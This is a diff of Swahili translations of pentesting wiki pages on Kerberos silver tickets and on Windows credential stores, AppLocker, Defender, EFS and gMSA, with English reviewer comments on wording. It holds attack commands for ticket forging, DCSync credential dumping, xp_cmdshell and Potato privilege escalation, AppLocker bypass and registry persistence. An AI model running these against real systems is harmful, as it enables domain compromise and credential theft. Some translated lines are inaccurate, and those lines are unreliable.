@ -36,11 +37,11 @@ mimikatz.exe "kerberos::ptt <TICKET_FILE>"
# Obtain a shell
.\PsExec.exe -accepteula \\<TARGET> cmd
```
Huduma ya CIFS imeonyeshwa kama lengo la kawaida la kupata mfumo wa faili wa mwathiriwa, lakini huduma nyingine kama HOST na RPCSS pia zinaweza kutumika kwa ajili ya kazi na maombi ya WMI.
Huduma ya CIFS imeangaziwa kama lengo la kawaida la kupata mfumo wa faili wa mwathiriwa, lakini huduma nyingine kama HOST na RPCSS pia zinaweza kutumiwa kwa ajili ya kazi na maswali ya WMI.
### Example: MSSQL service (MSSQLSvc) + Potato to SYSTEM
### Mfano: huduma ya MSSQL (MSSQLSvc) + Potato hadi SYSTEM
Kama una hash ya NTLM (au ufunguo wa AES) wa akaunti ya huduma ya SQL (kwa mfano, sqlsvc) unaweza kutengeneza TGS kwa MSSQL SPN na kujifanya mtumiaji yeyote kwa huduma ya SQL. Kutoka hapo, wezesha xp_cmdshell ili kutekeleza amri kama akaunti ya huduma ya SQL. Ikiwa token hiyo ina SeImpersonatePrivilege, unganisha Potato ili kupandisha hadhi hadi SYSTEM.
Ikiwa una hash ya NTLM (au ufunguo wa AES) wa akaunti ya huduma ya SQL (mfano, sqlsvc), unaweza kutengeneza TGS kwa MSSQL SPN na kuiga mtumiaji yeyote kwa huduma ya SQL. Kutoka hapo, wezesha xp_cmdshell ili kutekeleza amri kama akaunti ya huduma ya SQL. Ikiwa token hiyo ina SeImpersonatePrivilege, fanya mnyororo wa Potato ili kuinua cheo hadi SYSTEM.
```bash
# Forge a silver ticket for MSSQLSvc (RC4/NTLM example)
python ticketer.py -nthash <SQLSVC_RC4> -domain-sid <DOMAIN_SID> -domain <DOMAIN> \
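Review bot: "zinaweza kutumiwa kwa ajili ya kazi na maswali ya WMI" renders "tasks" as plain "kazi", which loses that these are scheduled tasks (the HOST service is what the Scheduled Tasks row of the service table below relies on); "scheduled tasks (kazi zilizopangwa) na maswali ya WMI" is more precise.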
@ -51,14 +52,14 @@ export KRB5CCNAME=$PWD/administrator.ccache
impacket-mssqlclient -k -no-pass <DOMAIN>/administrator@<host.fqdn>:1433 \
-q "EXEC sp_configure 'show advanced options',1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell',1;RECONFIGURE;EXEC xp_cmdshell 'whoami'"
```
- Ikiwa muktadha unaopatikana una SeImpersonatePrivilege (mara nyingi ni kweli kwa akaunti za huduma), tumia toleo la Potato kupata SYSTEM:
- Ikiwa muktadha uliopatikana una SeImpersonatePrivilege (mara nyingi kweli kwa service accounts), tumia Potato variant ili kupata SYSTEM:
```bash
# On the target host (via xp_cmdshell or interactive), run e.g. PrintSpoofer/GodPotato
PrintSpoofer.exe -c "cmd /c whoami"
# or
GodPotato -cmd "cmd /c whoami"
```
Maelezo zaidi kuhusu kutumia vibaya MSSQL na kuwezesha xp_cmdshell:
Maelezo zaidi kuhusu kutumia MSSQL na kuwezesha xp_cmdshell:
{{#ref}}
abusing-ad-mssql.md
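Review bot: "Maelezo zaidi kuhusu kutumia MSSQL" drops "vibaya" and so turns "abusing MSSQL" into "using MSSQL"; keep "kutumia vibaya MSSQL" as in the line it replaces, which also matches the linked page name abusing-ad-mssql.md.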
@ -72,14 +73,14 @@ Muhtasari wa mbinu za Potato:
## Huduma Zinazopatikana
| Service Type                               | Service Silver Tickets                                                     |
| Aina ya Huduma                            | Service Silver Tickets                                                     |
| ------------------------------------------ | -------------------------------------------------------------------------- |
| WMI                                        | <p>HOST</p><p>RPCSS</p>                                                    |
| PowerShell Remoting                        | <p>HOST</p><p>HTTP</p><p>Kulingana na OS pia:</p><p>WSMAN</p><p>RPCSS</p>  |
| WinRM                                      | <p>HOST</p><p>HTTP</p><p>Katika baadhi ya matukio unaweza kuomba tu: WINRM</p> |
| PowerShell Remoting                        | <p>HOST</p><p>HTTP</p><p>Kulingana na OS pia:</p><p>WSMAN</p><p>RPCSS</p> |
| WinRM                                      | <p>HOST</p><p>HTTP</p><p>Kwa baadhi ya wakati unaweza kuomba tu: WINRM</p> |
| Scheduled Tasks                            | HOST                                                                       |
| Windows File Share, also psexec            | CIFS                                                                       |
| LDAP operations, included DCSync           | <p>LDAP</p><p>ikiwa ni pamoja na DCSync</p>                                 |
| LDAP operations, included DCSync           | LDAP                                                                       |
| Windows Remote Server Administration Tools | <p>RPCSS</p><p>LDAP</p><p>CIFS</p>                                         |
| Golden Tickets                             | krbtgt                                                                     |
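Review bot: the header row now translates only its first cell ("Aina ya Huduma" next to the still-English "Service Silver Tickets"); translate both or neither. In the WinRM row, "Kwa baadhi ya wakati unaweza kuomba tu: WINRM" is awkward; the replaced "Katika baadhi ya matukio" ("in some cases") reads better. Collapsing the LDAP row to a bare "LDAP" is fine, since the row label already says "included DCSync".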
@ -87,23 +88,23 @@ Using **Rubeus** you may **ask for all** these tickets using the parameter:
- `/altservice:host,RPCSS,http,wsman,cifs,ldap,krbtgt,winrm`
### Vitambulisho vya Matukio vya Silver Tickets
### Silver tickets Vitambulisho vya Tukio
- 4624: Kuingia kwa Akaunti
- 4634: Kuondoka/Kutoka kwa Akaunti
- 4634: Kutoka kwa Akaunti
- 4672: Kuingia kwa Admin
## Uendelevu
Ili kuzuia mashine zisibadilishe nywila kila baada ya siku 30 weka `HKLM\SYSTEM\CurrentControlSet\Services\Netlogon\Parameters\DisablePasswordChange = 1` au unaweza kuweka `HKLM\SYSTEM\CurrentControlSet\Services\NetLogon\Parameters\MaximumPasswordAge` kwa thamani kubwa kuliko siku 30 kuonyesha kipindi cha mzunguko ambacho nywila ya mashine inapaswa kubadilishwa.
Ili kuzuia mashine zizungushe nywila zao kila 30 days weka `HKLM\SYSTEM\CurrentControlSet\Services\Netlogon\Parameters\DisablePasswordChange = 1` au unaweza kuweka `HKLM\SYSTEM\CurrentControlSet\Services\NetLogon\Parameters\MaximumPasswordAge` kuwa thamani kubwa kuliko 30days ili kuonyesha kipindi cha mzunguko ambapo nywila ya mashine inapaswa kugeuzwa.
## Abusing Service tickets
## Kutumia tikiti za huduma
Katika mifano iliyofuata tufikirie tiketi imepatikana kwa kuigiza akaunti ya administrator.
Katika mifano ifuatayo hebu tufikirie kuwa tikiti imetolewa kwa kuiga akaunti ya msimamizi.
### CIFS
Kwa tiketi hii utaweza kufikia folda za `C$` na `ADMIN$` kupitia **SMB** (ikiwa zime wazi) na kunakili mafaili kwenye sehemu ya mfumo wa faili wa mbali kwa kufanya kitu kama:
Ukitumia tikiti hii utaweza kupata ufikivu kwenye folda `C$` na `ADMIN$` kupitia **SMB** (ikiwa zimefunuliwa) na kunakili faili kwenye sehemu ya mfumo wa faili ya mbali kwa kufanya kitu kama:
```bash
dir \\vulnerable.computer\C$
dir \\vulnerable.computer\ADMIN$
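Review bot: the heading "Silver tickets Vitambulisho vya Tukio" has the qualifier detached from the noun phrase and is ungrammatical; the replaced "Vitambulisho vya Matukio vya Silver Tickets" is the correct form. "kila 30 days" and "kuliko 30days" mix English into the persistence sentence and drop a space; the replaced "kila baada ya siku 30" / "kuliko siku 30" was right. The hunk also spells the word both ways, "tiketi" and "tikiti"; pick one (the rest of the page uses "tiketi").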
@ -117,7 +118,7 @@ Pia utaweza kupata shell ndani ya host au kutekeleza amri zozote kwa kutumia **p
### HOST
Kwa ruhusa hii unaweza kuunda kazi zilizopangwa kwenye kompyuta za mbali na kutekeleza amri zozote:
Kwa ruhusa hii unaweza kuunda scheduled tasks kwenye remote computers na execute arbitrary commands:
```bash
#Check you have permissions to use schtasks over a remote server
schtasks /S some.vuln.pc
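Review bot: "unaweza kuunda scheduled tasks kwenye remote computers na execute arbitrary commands" leaves most of the sentence in English; the replaced "kuunda kazi zilizopangwa kwenye kompyuta za mbali na kutekeleza amri zozote" was fully translated and should stay.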
@ -131,7 +132,7 @@ schtasks /Run /S mcorp-dc.moneycorp.local /TN "SomeTaskName"
```
### HOST + RPCSS
Kwa tikiti hizi unaweza **kutekeleza WMI kwenye mfumo wa mwathiriwa**:
Kwa tiketi hizi unaweza **kutekeleza WMI katika mfumo wa mwathiri**:
```bash
#Check you have enough privileges
Invoke-WmiMethod -class win32_operatingsystem -ComputerName remote.computer.local
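Review bot: "mfumo wa mwathiri" should be "mfumo wa mwathiriwa"; "mwathiriwa" is the standard word for victim and is what the replaced line and the CIFS section use.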
@ -150,11 +151,11 @@ Pata **maelezo zaidi kuhusu wmiexec** kwenye ukurasa ufuatao:
### HOST + WSMAN (WINRM)
Ikiwa una ufikiaji wa winrm kwenye kompyuta unaweza **kuifikia** na hata kupata PowerShell:
Kwa ufikiaji wa winrm kwenye kompyuta unaweza **kuifikia** na hata kupata PowerShell:
```bash
New-PSSession -Name PSC -ComputerName the.computer.name; Enter-PSSession PSC
```
Check the following page to learn **njia zaidi za kuunganishwa na mwenyeji wa mbali ukitumia winrm**:
Angalia ukurasa ufuatao ili kujifunza **njia zaidi za kuunganisha na mwenyeji wa mbali kutumia winrm**:
{{#ref}}
@ -162,15 +163,15 @@ Check the following page to learn **njia zaidi za kuunganishwa na mwenyeji wa mb
{{#endref}}
> [!WARNING]
> Kumbuka kwamba **winrm lazima iwe imewezeshwa na ikisikiliza** kwenye kompyuta ya mbali ili kuifikia.
> Kumbuka kwamba **winrm lazima iwe hai na ikisikiliza** kwenye kompyuta ya mbali ili kuifikia.
### LDAP
Kwa ruhusa hii unaweza dump DC database ukitumia **DCSync**:
Kwa ruhusa hii unaweza dump hifadhidata ya DC ukitumia **DCSync**:
```
mimikatz(commandline) # lsadump::dcsync /dc:pcdc.domain.local /domain:domain.local /user:krbtgt
```
**Jifunze zaidi kuhusu DCSync** katika ukurasa ufuatao:
**Jifunze zaidi kuhusu DCSync** kwenye ukurasa ufuatao:
{{#ref}}
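Review bot: "dump" in "unaweza dump hifadhidata ya DC ukitumia **DCSync**" is left untranslated in both the old and the new line, and the mimikatz block above still opens with a bare ``` fence while the other blocks in this file carry a language tag; consider "unaweza kunakili (dump) hifadhidata ya DC" and a tagged fence so the block is highlighted like the rest.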
@ -178,7 +179,7 @@ dcsync.md
{{#endref}}
## Marejeo
## Marejeleo
- [https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/kerberos-silver-tickets](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/kerberos-silver-tickets)
- [https://www.tarlogic.com/blog/how-to-attack-kerberos/](https://www.tarlogic.com/blog/how-to-attack-kerberos/)
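Review bot: the heading change "## Marejeo" -> "## Marejeleo" is fine ("Marejeleo" is the usual form), but the references heading should then be spelled the same way on the other translated pages in this commit so the section is named consistently across the corpus.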
@ -4,14 +4,14 @@
## Sera ya AppLocker
Orodha nyeupe ya programu ni orodha ya programu za programu zilizokubaliwa au faili za utekelezaji zinazoruhusiwa kuwepo na kuendeshwa kwenye mfumo. Lengo ni kulinda mazingira dhidi ya malware hatari na programu zisizoruhusiwa ambazo hazilingani na mahitaji maalum ya biashara ya shirika.
Orodha nyeupe ya programu ni orodha ya programu zilizoidhinishwa au faili zinazotekelezwa ambazo zinaruhusiwa kuwepo na kuendeshwa kwenye mfumo. Lengo ni kulinda mazingira dhidi ya malware yenye madhara na programu zisizoidhinishwa ambazo hazilingani na mahitaji maalum ya biashara ya shirika.
[AppLocker](https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/applocker/what-is-applocker) ni suluhisho la Microsoft la **orodha nyeupe ya programu** na huwapa wasimamizi wa mfumo udhibiti juu ya **programu na faili ambazo watumiaji wanaweza kuendesha**. Inatoa **udhibiti wa kina** juu ya executables, scripts, Windows installer files, DLLs, packaged apps, na packed app installers.\
Ni kawaida kwa mashirika **kuzuia cmd.exe na PowerShell.exe** na upatikanaji wa kuandika kwa saraka fulani, **lakini yote haya yanaweza kuepukika**.
[AppLocker](https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/applocker/what-is-applocker) ni suluhisho la Microsoft la **application whitelisting** na huwapa wasimamizi wa mfumo udhibiti juu ya **ni programu na faili gani watumiaji wanaweza kuendesha**. Inatoa **udhibiti wa undani** juu ya executables, scripts, Windows installer files, DLLs, packaged apps, and packed app installers.\
Ni kawaida kwa mashirika **kuzuia cmd.exe na PowerShell.exe** na upatikanaji wa kuandika kwenye saraka fulani, **lakini yote haya yanaweza kuzungukwa**.
### Angalia
Angalia ni faili/viendelezi gani vimeorodheshwa kwenye orodha nyeusi au orodha nyeupe:
Angalia ni faili/upanuisaji gani ziko kwenye orodha nyeusi/nyeyeupe:
```bash
Get-ApplockerPolicy -Effective -xml
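Review bot: "nyeyeupe" in the new "Angalia ni faili/upanuisaji gani ziko kwenye orodha nyeusi/nyeyeupe:" is a typo for "nyeupe", and "upanuisaji" should be "viendelezi" (file extensions) as in the replaced line; the new AppLocker paragraph also ends with the untranslated "packaged apps, and packed app installers" where the old line had "na". The subheading "### Angalia" here sits beside "### Check" in the Defender section below, so settle on one of the two for the check subsections.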
@ -20,60 +20,60 @@ Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections
$a = Get-ApplockerPolicy -effective
$a.rulecollections
```
Njia hii ya rejista ina usanidi na sera zinazotumika na AppLocker, ikitoa njia ya kupitia seti ya sasa ya sheria zinazotekelezwa kwenye mfumo:
Njia hii ya rejista ina mipangilio na sera zinazotumika na AppLocker, ikitoa njia ya kupitia seti ya sasa ya kanuni zinazotekelezwa kwenye mfumo:
- `HKLM\Software\Policies\Microsoft\Windows\SrpV2`
### Bypass
- Zinazofaa **Writable folders** za ku-bypass AppLocker Policy: Ikiwa AppLocker inaruhusu kutekeleza chochote ndani ya `C:\Windows\System32` au `C:\Windows`, kuna **writable folders** ambazo unaweza kutumia ili **bypass this**.
- Folda muhimu **zinazoweza kuandikwa** za bypass sera ya AppLocker: Ikiwa AppLocker inaruhusu kuendesha chochote ndani ya `C:\Windows\System32` au `C:\Windows` kuna **folda zinazoweza kuandikwa** unaweza kutumia ili **bypass this**.
```
C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys
C:\Windows\System32\spool\drivers\color
C:\Windows\Tasks
C:\windows\tracing
```
- Kwa kawaida mafaili ya **zinazoaminika** [**"LOLBAS's"**](https://lolbas-project.github.io/) binaries pia yanaweza kusaidia kupitisha AppLocker.
- **Sheria zilizotengenezwa vibaya pia zinaweza kupitishwa**
- Kwa mfano, **`<FilePathCondition Path="%OSDRIVE%*\allowed*"/>`**, unaweza kuunda **folda iitwayo `allowed`** mahali popote na itaruhusiwa.
- Mashirika pia mara nyingi hujikita katika **kuzuia `%System32%\WindowsPowerShell\v1.0\powershell.exe` executable**, lakini husahau kuhusu **mengine** [**PowerShell executable locations**](https://www.powershelladmin.com/wiki/PowerShell_Executables_File_System_Locations) kama `%SystemRoot%\SysWOW64\WindowsPowerShell\v1.0\powershell.exe` au `PowerShell_ISE.exe`.
- **DLL enforcement mara chache huwa imewezeshwa** kutokana na mzigo wa ziada inaweza kuweka kwenye mfumo, na wingi wa upimaji unaohitajika kuhakikisha hakuna kitu kitakachovunjika. Kwa hivyo kutumia **DLLs as backdoors** kutasaidia kupitisha AppLocker.
- Unaweza kutumia [**ReflectivePick**](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick) au [**SharpPick**](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick) kutekeleza **Powershell** code katika mchakato wowote na kupitisha AppLocker. Kwa taarifa zaidi angalia: [https://hunter2.gitbook.io/darthsidious/defense-evasion/bypassing-applocker-and-powershell-constrained-language-mode](https://hunter2.gitbook.io/darthsidious/defense-evasion/bypassing-applocker-and-powershell-constrained-language-mode).
- Mara nyingi **zinaaminika** [**"LOLBAS's"**](https://lolbas-project.github.io/) binaries zinaweza pia kuwa muhimu kupita AppLocker.
- **Kanuni zilizotungwa vibaya pia zinaweza kupitishwa**
- Kwa mfano, **`<FilePathCondition Path="%OSDRIVE%*\allowed*"/>`**, unaweza kuunda **kabrasha liitwalo `allowed`** mahali popote na litaruhusiwa.
- Mashirika pia mara nyingi hufanya mkazo wa **kuzuia the `%System32%\WindowsPowerShell\v1.0\powershell.exe` executable**, lakini husahau kuhusu **other** [**PowerShell executable locations**](https://www.powershelladmin.com/wiki/PowerShell_Executables_File_System_Locations) kama `%SystemRoot%\SysWOW64\WindowsPowerShell\v1.0\powershell.exe` au `PowerShell_ISE.exe`.
- **DLL enforcement haizinduliwa mara chache sana** kutokana na mzigo wa ziada inaweza kuweka kwenye mfumo, na kiwango cha majaribio kinachohitajika kuhakikisha hakitavunjika kitu. Kwa hivyo kutumia **DLLs kama backdoors kuta kusaidia kupita AppLocker**.
- Unaweza kutumia [**ReflectivePick**](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick) au [**SharpPick**](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick) kuendesha **Powershell** code katika mchakato wowote na kupita AppLocker. Kwa maelezo zaidi angalia: [https://hunter2.gitbook.io/darthsidious/defense-evasion/bypassing-applocker-and-powershell-constrained-language-mode](https://hunter2.gitbook.io/darthsidious/defense-evasion/bypassing-applocker-and-powershell-constrained-language-mode).
## Credentials Storage
### Security Accounts Manager (SAM)
Taarifa za kuingia za eneo zipo katika faili hii; nywila zimehashiwa.
Local credentials zipo katika faili hii, nywila zimehashiwa.
### Local Security Authority (LSA) - LSASS
Taarifa za kuingia (zilizo hashed) zimeshifadhiwa katika kumbukumbu ya subsistemu hii kwa sababu za Single Sign-On.\
**LSA** inaendesha sera za **usalama wa eneo** (sera za nywila, ruhusa za watumiaji...), **authentication**, **access tokens**...\
LSA ndicho kitakachokagua cheti zilizotolewa ndani ya faili ya **SAM** (kwa kuingia kwa eneo) na kuzungumza na **domain controller** kuthibitisha mtumiaji wa domain.
The **credentials** (hashed) zinaletwa **hifadhiwa** katika **memory** ya subsystem hii kwa sababu za Single Sign-On.\
**LSA** inadhibiti **security policy** ya eneo (sera za nywila, ruhusa za watumiaji...), **authentication**, **access tokens**...\
LSA itakuwa ile itakayefanya **check** kwa credentials zilizotolewa ndani ya faili ya **SAM** (kwa login ya ndani) na **zungumza** na **domain controller** ili ku-authenticate mtumiaji wa domain.
Taarifa za kuingia zimeshifadhiwa ndani ya mchakato **LSASS**: tiketi za Kerberos, hashes NT na LM, nywila zinazoweza kufunguliwa kwa urahisi.
The **credentials** zimeshifadhiwa ndani ya **process LSASS**: Kerberos tickets, hashes NT na LM, nywila zinazoweza kufunuliwa kwa urahisi.
### LSA secrets
LSA inaweza kuhifadhi kwenye diski baadhi ya taarifa za kuingia:
LSA inaweza kuhifadhi kwenye diski baadhi ya credentials:
- Nywila ya akaunti ya kompyuta ya Active Directory (domain controller isiyoweza kufikiwa).
- Nywila ya akaunti ya kompyuta ya Active Directory (domain controller isiyoweza kupatikana).
- Nywila za akaunti za huduma za Windows
- Nywila za kazi zilizopangwa
- Zaidi (nywila za programu za IIS...)
- Nywila za scheduled tasks
- Zaidi (nywila za IIS applications...)
### NTDS.dit
Ni hifadhidata ya Active Directory. Ipo tu kwenye Domain Controllers.
Ni database ya Active Directory. Iko tu kwenye Domain Controllers.
## Defender
[**Microsoft Defender**](https://en.wikipedia.org/wiki/Microsoft_Defender) ni Antivirus inayopatikana katika Windows 10 na Windows 11, na katika toleo za Windows Server. Inazuia zana za kawaida za pentesting kama **`WinPEAS`**. Hata hivyo, kuna njia za **kupitisha ulinzi huu**.
[**Microsoft Defender**](https://en.wikipedia.org/wiki/Microsoft_Defender) ni Antivirus inayopatikana katika Windows 10 na Windows 11, na kwenye toleo za Windows Server. Inazuia zana za kawaida za pentesting kama **`WinPEAS`**. Hata hivyo, kuna njia za **kupita kinga hizi**.
### Check
Ili kukagua **hali** ya **Defender** unaweza kutekeleza PS cmdlet **`Get-MpComputerStatus`** (angalia thamani ya **`RealTimeProtectionEnabled`** kujua kama imewezeshwa):
Ili kukagua **status** ya **Defender** unaweza kutekeleza PS cmdlet **`Get-MpComputerStatus`** (angalia thamani ya **`RealTimeProtectionEnabled`** kujua kama iko hai):
<pre class="language-powershell"><code class="lang-powershell">PS C:\> Get-MpComputerStatus
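Review bot: the new bullet "**DLL enforcement haizinduliwa mara chache sana**" inverts the meaning of the replaced "DLL enforcement mara chache huwa imewezeshwa" (DLL enforcement is rarely enabled), and "kuta kusaidia" in the same bullet should read "kutasaidia"; two bullets above it, "kuzuia the `%System32%\WindowsPowerShell\v1.0\powershell.exe` executable" keeps a stray English "the". In the LSA paragraph, "LSA itakuwa ile itakayefanya **check**" should be "itakayofanya", and "zinaletwa **hifadhiwa** katika **memory**" reads oddly where a plain "zimehifadhiwa" would do.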
@ -92,7 +92,7 @@ NISEngineVersion                : 0.0.0.0
PSComputerName                  :
</code></pre>
Kwa ajili ya kuorodhesha pia unaweza kuendesha:
Ili kuorodhesha pia unaweza kuendesha:
```bash
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List
wmic /namespace:\\root\securitycenter2 path antivirusproduct
@ -103,102 +103,102 @@ sc query windefend
```
## Encrypted File System (EFS)
EFS inalinda faili kwa usimbaji, ikitumia **ufunguo wa simetriki** unaojulikana kama **File Encryption Key (FEK)**. Ufunguo huu unasimbwa kwa kutumia **public key** ya mtumiaji na kuhifadhiwa ndani ya $EFS **alternative data stream** ya faili iliyosimbwa. Wakati ufunguzi unahitajika, **private key** inayolingana ya cheti dijitali la mtumiaji inatumika kusimua FEK kutoka kwenye mfululizo wa $EFS. Maelezo zaidi yanaweza kupatikana [here](https://en.wikipedia.org/wiki/Encrypting_File_System).
EFS inalinda faili kupitia usimbaji, ikitumia **ufunguo simetriki** unayejulikana kama **File Encryption Key (FEK)**. Ufunguo huu unasimbwa kwa kutumia **funguo la umma** la mtumiaji na unahifadhiwa ndani ya $EFS **alternative data stream** ya faili iliyosimbwa. Wakati ufungaji (decryption) unabidi, **funguo binafsi** inayofanana na cheti dijitali la mtumiaji inatumiwa kufungua FEK kutoka kwenye mtiririko wa $EFS. More details can be found [here](https://en.wikipedia.org/wiki/Encrypting_File_System).
**Madaraja ya kuyafungua bila kuanzishwa na mtumiaji** ni pamoja na:
**Matukio ya kufungua (decryption) bila kuamshwa na mtumiaji** ni pamoja na:
- Wakati faili au folda zinapotamishwa kwenda kwenye mfumo wa faili usio wa EFS, kama [FAT32](https://en.wikipedia.org/wiki/File_Allocation_Table), zinafutwa usimbaji kwa 자동.
- Faili zilizofichwa zinazotumwa kupitia mtandao kwa protokoli ya SMB/CIFS zinasimuliwa kabla ya kutumwa.
- Wakati faili au folda zinaposogezwa kwenye mfumo wa faili usio-EFS, kama [FAT32](https://en.wikipedia.org/wiki/File_Allocation_Table), zinafufuliwa (decrypted) kwa njia ya moja kwa moja.
- Faili zilizofichwa zinazotumwa mtandaoni kwa kutumia itifaki ya SMB/CIFS zinafufuliwa kabla ya usafirishaji.
Njia hii ya usimbaji inaruhusu **ufikiaji wazi** wa faili zilizofichwa kwa mmiliki. Hata hivyo, kubadilisha nenosiri la mmiliki na kuingia tu hakutaruhusu kusimuliwa.
Njia hii ya usimbaji inaruhusu upatikanaji wa wazi kwa faili zilizofichwa kwa mmiliki. Hata hivyo, kubadilisha tu nywila ya mmiliki na kuingia haitawezi kuruhusu ufungaji.
**Mambo muhimu kukumbuka**:
Key Takeaways:
- EFS inatumia FEK wa simetriki, iliyosimbwa kwa public key ya mtumiaji.
- Kusimua kunatumia private key ya mtumiaji kupata FEK.
- Kusimuliwa kwa automatiki hutokea katika hali maalum, kama kunakopywa kwenye FAT32 au wakati wa usafirishaji wa mtandao.
- Faili zilizofichwa zinapatikana kwa mmiliki bila hatua za ziada.
- EFS inatumia FEK simetriki, iliyosimbwa kwa funguo la umma la mtumiaji.
- Kufungua (decryption) kunatumia funguo binafsi la mtumiaji kupata FEK.
- Kufunguka kwa njia ya moja kwa moja hufanyika katika hali maalum, kama kunakokopiwa kwenye FAT32 au kusafirishwa mtandaoni.
- Faili zilizofichwa zinaweza kupatikana na mmiliki bila hatua za ziada.
### Check EFS info
Angalia kama **mtumiaji** ame **tumia** **huduma** hii kwa kukagua kama njia hii ipo:`C:\users\<username>\appdata\roaming\Microsoft\Protect`
Angalia kama **mtumiaji** ame**tumia** huduma hii kwa kuangalia kama njia hii ipo: `C:\users\<username>\appdata\roaming\Microsoft\Protect`
Check **who** has **access** to the file using cipher /c \<file>\
Angalia **nani** ana **ufikiaji** wa faili ukitumia `cipher /c \<file>\`  
Unaweza pia kutumia `cipher /e` na `cipher /d` ndani ya folda ili **encrypt** na **decrypt** faili zote
### Decrypting EFS files
#### Being Authority System
#### Kuwa System Authority
Njia hii inahitaji **mtumiaji wa mwathiriwa** kuwa **anazungusha** **mchakato** ndani ya host. Ikiwa hivyo ndio hali, kwa kutumia session za `meterpreter` unaweza kujifanya token ya mchakato wa mtumiaji (`impersonate_token` kutoka `incognito`). Au unaweza tu `migrate` kwenda mchakato wa mtumiaji.
Njia hii inahitaji **mtumiaji wa mwathiriwa** kuwa anae**endesha** **mchakato** ndani ya mwenyeji. Ikiwa hivyo ni kesi, kwa kutumia session za `meterpreter` unaweza kuiga token ya mchakato wa mtumiaji (`impersonate_token` kutoka `incognito`). Au unaweza tu `migrate` kwenda kwenye mchakato wa mtumiaji.
#### Knowing the users password
#### Kujua nywila za watumiaji
{{#ref}}
https://github.com/gentilkiwi/mimikatz/wiki/howto-~-decrypt-EFS-files
{{#endref}}
## Group Managed Service Accounts (gMSA)
## Akaunti za Group Managed Service (gMSA)
Microsoft ilitengeneza **Group Managed Service Accounts (gMSA)** kurahisisha usimamizi wa akaunti za service katika miundombinu ya IT. Tofauti na akaunti za service za jadi ambazo mara nyingi zinawekwa na sifa ya "**Password never expire**", gMSA zinatoa suluhisho salama na rahisi kusimamia:
Microsoft ilitengeneza **Group Managed Service Accounts (gMSA)** kurahisisha usimamizi wa akaunti za huduma katika miundombinu ya IT. Tofauti na akaunti za huduma za jadi ambazo mara nyingi zinawekwa na "Password never expire", gMSA zinatoa suluhisho salama zaidi na rahisi kusimamia:
- **Automatic Password Management**: gMSA zinatumia nenosiri tata la herufi 240 ambalo hubadilika kiotomatiki kulingana na sera za domain au kompyuta. Mchakato huu unafanywa na Key Distribution Service (KDC) ya Microsoft, kuondoa hitaji la masasisho ya nenosiri kwa mikono.
- **Enhanced Security**: Akaunti hizi hazifikiriwi kwa lockouts na hazitumiwi kwa interactive logins, hivyo kuongeza usalama.
- **Multiple Host Support**: gMSA zinaweza kushirikiwa kati ya host nyingi, zikifanya kuwa bora kwa services zinazoendesha kwenye server nyingi.
- **Automatic Password Management**: gMSA zinatumia nywila tata ya herufi 240 inayobadilika kiotomatiki kulingana na sera ya domain au kompyuta. Mchakato huu unafanywa na Key Distribution Service (KDC) ya Microsoft, kuondoa haja ya masasisho ya nywila kwa mikono.
- **Enhanced Security**: Akaunti hizi hazina uwezekano wa kufungwa (lockouts) na haiwezi kutumika kwa ingia ya mtumiaji wa kisasa (interactive logins), jambo linaloimarisha usalama wao.
- **Multiple Host Support**: gMSA zinaweza kushirikiwa kati ya hosts nyingi, hivyo zinafaa kwa huduma zinazotumika kwenye server nyingi.
- **Scheduled Task Capability**: Tofauti na managed service accounts, gMSA zinaunga mkono kuendesha scheduled tasks.
- **Simplified SPN Management**: Mfumo hubadilisha Service Principal Name (SPN) kiotomatiki wakati kuna mabadiliko kwa sAMaccount details za kompyuta au jina la DNS, kurahisisha usimamizi wa SPN.
- **Simplified SPN Management**: Mfumo hubadilisha kwa otomatiki Service Principal Name (SPN) pale panapobadilika sAMaccount details za kompyuta au jina la DNS, kurahisisha usimamizi wa SPN.
Nenosiri za gMSA zimetunzwa kwenye mali ya LDAP _**msDS-ManagedPassword**_ na hubadilishwa kiotomatiki kila siku 30 na Domain Controllers (DCs). Nenosiri hili, blob ya data iliyosimbwa inayojulikana kama [MSDS-MANAGEDPASSWORD_BLOB](https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-adts/a9019740-3d73-46ef-a9ae-3ea8eb86ac2e), inaweza kuonekana tu na wasimamizi walioidhinishwa na server zinazoweka gMSA, kuhakikisha mazingira salama. Ili kupata taarifa hii, inahitaji muunganisho uliolindwa kama LDAPS, au muunganisho lazima uwe authenticated na 'Sealing & Secure'.
Nywila za gMSA zimo katika kipengele cha LDAP _**msDS-ManagedPassword**_ na zinasasishwa kiotomatiki kila siku 30 na Domain Controllers (DCs). Nywila hii, blob ya data iliyosimbwa inayojulikana kama [MSDS-MANAGEDPASSWORD_BLOB](https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-adts/a9019740-3d73-46ef-a9ae-3ea8eb86ac2e), inaweza tu kutolewa na wasimamizi walioidhinishwa na servers ambazo gMSA zimewekwa, kuhakikisha mazingira salama. Ili kupata taarifa hii, inahitajika muunganisho uliolindwa kama LDAPS, au muunganisho lazima uwe authenticated na 'Sealing & Secure'.

Unaweza kusoma nenosiri hili kwa kutumia [**GMSAPasswordReader**](https://github.com/rvazarkar/GMSAPasswordReader)**:**
Unaweza kusoma nywila hii kwa kutumia [**GMSAPasswordReader**](https://github.com/rvazarkar/GMSAPasswordReader)**:**
```
/GMSAPasswordReader --AccountName jkohler
```
[**Find more info in this post**](https://cube0x0.github.io/Relaying-for-gMSA/)
Pia, angalia [web page](https://cube0x0.github.io/Relaying-for-gMSA/) kuhusu jinsi ya kutekeleza **NTLM relay attack** ili **read** **password** ya **gMSA**.
Pia, angalia [web page](https://cube0x0.github.io/Relaying-for-gMSA/) kuhusu jinsi ya kufanya **NTLM relay attack** ili **kusoma** **nenosiri** la **gMSA**.
### Kutumia vibaya mnyororo wa ACL kusoma password iliyosimamiwa ya gMSA (GenericAll -> ReadGMSAPassword)
### Abusing ACL chaining to read gMSA managed password (GenericAll -> ReadGMSAPassword)
